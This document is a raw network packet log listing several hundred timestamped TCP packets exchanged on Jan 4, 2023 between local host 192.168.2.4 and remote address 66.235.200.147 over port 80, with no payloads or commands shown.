Jan 4, 2023 16:47:45.349426985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349427938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349445105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349452972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349476099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349478960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349499941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349503994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349523067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349539042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349546909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349570036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349574089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349595070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349600077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349622965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349642992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.368886948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.368927002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.369060040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.369100094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.396645069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.397243023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.413729906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.413820028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.413846016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.413896084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.413913012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.413978100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.413985014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414051056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414056063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414129972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414130926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414194107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414211035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414273024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414277077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414338112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414345980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414406061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414423943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414489031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414494991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414555073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414601088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414665937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414680004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414725065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414771080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414834023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414860010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414921999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.414927959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.414989948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415003061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415059090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415070057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415127039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415136099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415205002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415213108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415278912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415280104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415335894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415347099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415402889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415412903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415473938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415491104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415551901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415561914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415618896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415648937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415714025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415721893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415767908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415783882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415852070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415863037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415913105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415921926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.415982962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.415983915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416048050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416141033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416202068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416212082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416261911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416266918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416331053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416361094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416388035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416399956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416460037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416466951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416523933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416531086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416596889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416599035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416657925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416692019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416750908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416762114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416822910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416830063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416889906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416899920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.416963100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.416965008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417025089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417032003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417090893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417098999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417165041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417165995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417234898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417243958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417309999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417310953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417366028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417376041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417433977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417440891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417504072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417509079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417567015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417574883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417632103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417639971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417733908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417771101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417808056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417835951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417853117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417864084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417865038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417879105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417891026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417903900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417920113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417943954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417949915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417963028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.417979002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.417994976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418006897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418020010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418032885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418061018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418086052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418113947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418114901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418132067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418140888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418160915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418168068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418189049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418195963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418220043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418222904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418251991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418252945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418277979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418278933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418298006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418307066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418329954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418334961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418354034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418364048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418373108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418391943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418412924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418417931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418432951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418445110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418459892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418472052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418493032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418500900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418513060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418529034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418554068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418555975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418580055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418589115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418601990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418617010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418633938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418643951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418665886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418670893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418685913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418714046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418720961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418741941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418765068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418770075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418796062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418798923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418816090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418828964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418850899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418858051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418872118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418888092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418905020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418917894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418936014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418947935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418963909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.418983936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.418998957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419012070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419028044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419039965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419055939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419068098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419085026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419095993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419115067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419125080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419142008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419153929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419171095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419183016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419199944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419213057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419231892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419240952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419253111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419270039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419287920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419322014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419341087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419348001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419363976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419377089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419393063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419406891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419425011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419436932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419454098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419465065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419482946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419493914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419509888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419522047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419537067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419548988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419568062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419576883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419589996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419605970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419631958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419632912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419657946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419667006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419686079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419691086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419714928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419714928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419739008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419744015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419766903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419770956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419789076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419800997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419810057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419826984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419851065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419855118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419872999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419883013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419893026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419910908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419933081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419939995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419954062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419965982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.419987917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.419994116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420011044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420023918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420039892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420052052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420072079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420078993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420097113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420108080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420125008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420135021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420151949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420162916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420181990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420190096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420202971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420219898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420233011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420245886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420259953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420274019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420288086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420300961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420320034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420329094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420356989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420356989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420376062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420386076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420402050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420413971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420430899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420440912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420460939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420466900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420483112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420495987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420507908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420525074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420540094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420552969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420567036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420579910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420603037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420608997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420620918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420636892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420651913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420665979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420681000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420695066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420708895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420721054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420738935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420748949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420761108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420777082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420793056 CET	49696	80	192.168.2.4	66.235.200.147
